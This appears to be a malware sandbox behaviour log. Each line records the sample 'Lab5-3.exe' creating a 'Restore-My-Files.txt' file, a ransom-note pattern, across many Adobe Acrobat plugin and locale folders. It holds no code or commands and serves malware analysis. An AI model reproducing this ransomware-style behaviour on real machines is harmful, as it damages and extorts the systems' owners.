                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
